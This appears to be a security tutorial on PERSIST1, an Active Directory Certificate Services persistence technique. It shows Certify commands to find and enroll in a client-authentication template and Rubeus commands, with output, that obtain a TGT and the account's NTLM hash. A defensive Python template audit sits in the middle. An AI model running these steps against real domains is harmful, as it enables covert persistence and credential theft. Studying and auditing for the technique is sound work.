PERSIST1 is a technique that extends initial access to a user account into persistent access by requesting a client authentication certificate in the context of that account; the certificate can then be used to authenticate as the account in the future. If, for example, a phishing attack succeeds and yields access as a user whose credentials are unknown, persistent access to that user can be obtained through a certificate instead.

Template Requirements

According to Certified Pre-Owned, a suitable certificate template must meet these criteria:
• The enterprise CA grants enrollment rights to the user account. Otherwise, the account would be unable to request any certificates from the CA.
• The certificate template grants enrollment rights to the user account. Otherwise, the account would be unable to request certificates based on the specific template.
• The “manager approval” feature is disabled for the certificate template. Otherwise, a “CA Manager” would have to manually review and approve the certificate request.
• The “authorized signature” feature is disabled for the certificate template. Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
• The certificate template defines an Extended Key Usage (EKU) that enables client authentication:
  • Client Authentication (1.3.6.1.5.5.7.3.2)
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
  • Any Purpose (2.5.29.37.0)
  • Subordinate CA (No EKUs)

Enumeration

We can search for certificate templates that meet these conditions with the enum-templates command from Certify and its --filter-client-auth option.
Certify.exe enum-templates --filter-enabled --filter-client-auth --hide-admins
Use --filter-enabled to show only templates published by a CA, and --hide-admins to reduce noise in the output.
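The template conditions above, and the filter that Certify's enum-templates applies, can be checked from the defender's side by auditing the same LDAP attributes of each template object. The following Python is an added example, not Certify's code or this page's: it assumes the template attributes have already been read from the Configuration partition into the small Template record below (the attribute each field corresponds to is given as a comment), and it runs over constructed sample templates.

```python
from dataclasses import dataclass
# EKU OIDs from the template requirements that enable client authentication
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
CT_FLAG_PEND_ALL_REQUESTS = 0x2  # msPKI-Enrollment-Flag bit: "manager approval" enabled
# Broad principals: Enroll granted to any of these is reachable from a phished user
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}
@dataclass
class Template:                   # one template object, fields named after LDAP attributes
    name: str
    published: bool               # named in a CA's certificateTemplates attribute
    enroll_principals: list[str]  # principals holding Enroll in the template's ACL
    enrollment_flag: int          # msPKI-Enrollment-Flag
    ra_signatures: int            # msPKI-RA-Signature: authorized signatures required
    ekus: list[str]               # pKIExtendedKeyUsage OIDs (empty = no restriction)
    expiration_period: bytes      # pKIExpirationPeriod, raw 8-byte LDAP value

def validity_days(raw: bytes) -> int:
    """pKIExpirationPeriod is a negative little-endian int64 counting 100 ns ticks."""
    ticks = int.from_bytes(raw, "little", signed=True)
    return abs(ticks) // 10_000_000 // 86_400
def allows_client_auth(ekus: list[str]) -> bool:
    # no EKU at all (e.g. a Subordinate CA template) places no restriction on usage
    return not ekus or bool(CLIENT_AUTH_EKUS & set(ekus))
def persist1_exposed(t: Template) -> bool:
    """True only when every PERSIST1 template requirement holds at once."""
    return (t.published
            and bool(LOW_PRIV_PRINCIPALS & set(t.enroll_principals))
            and not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS
            and t.ra_signatures == 0
            and allows_client_auth(t.ekus))

def report(templates: list[Template]) -> list[str]:
    """Exposed templates with the validity period their certificates will carry."""
    return [f"{t.name}: exposed, certificates valid {validity_days(t.expiration_period)} days"
            for t in templates if persist1_exposed(t)]

# Constructed sample templates; ONE_YEAR is one year exactly as AD CS stores it in LDAP
ONE_YEAR = bytes.fromhex("004039872ee1feff")
SAMPLE = [
    Template("User", True, ["Domain Users"], 0x29, 0, ["1.3.6.1.5.5.7.3.2"], ONE_YEAR),
    Template("ApprovedUser", True, ["Domain Users"], 0x2B, 0, ["1.3.6.1.5.5.7.3.2"], ONE_YEAR),
    Template("WebServer", True, ["Domain Users"], 0x0, 0, ["1.3.6.1.5.5.7.3.1"], ONE_YEAR),
    Template("SubCA", True, ["Domain Admins"], 0x0, 0, [], ONE_YEAR),
]
print("\n".join(report(SAMPLE)))
```

Only the User-style template is reported: ApprovedUser is blocked by manager approval, WebServer carries only the Server Authentication EKU, and SubCA is enrollable solely by Domain Admins.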
Once we have identified a suitable certificate template that the user account can enroll in, we can request a certificate based on the template using the request command from Certify.
> Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template User

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Request a certificate

[*] Current user context    : CORP\lowpriv
[*] No subject name specified, using current context as subject.

[*] Template                : User
[*] Subject                 : CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local

[*] Certificate Authority   : ca01.corp.local\CORP-CA01-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 1

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...

Certify completed in 00:00:04.3614718
When the certificate has been issued, it can be used to persistently authenticate as the user account using the asktgt command from Rubeus. We can also use the /getcredentials parameter to request a U2U service ticket and retrieve the password NT hash for the user account.
> Rubeus.exe asktgt /user:lowpriv /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh... /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: E=lowpriv@corp.local, CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.local\lowpriv'
[*] Using domain controller: 10.10.10.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGHjCCBhqgAwIBBaEDAgEWooIFMTCCBS1hggUpMIIFJaADAgEFoQ8bDU1FR0FLRUsuTE9DQUyiIjAg
      ...

  ServiceName              :  krbtgt/corp.local
  ServiceRealm             :  CORP.LOCAL
  UserName                 :  lowpriv
  UserRealm                :  CORP.LOCAL
  StartTime                :  30/06/2025 15.16.52
  EndTime                  :  01/07/2025 01.16.52
  RenewTill                :  07/07/2025 15.16.52
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  AFXzq5Bai41JhCj70jrfyA==
  ASREP (key)              :  D4F939DAB9C7B93717EB048B0F0F5F5C

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
+      NTLM              : 31D6CFE0D16AE931B73C59D7E0C089C0

The issued certificate remains usable for authentication for the duration set in the Validity Period attribute of the certificate template. To extend persistence beyond that period, use PERSIST3 - Account Persistence via Certificate Renewal.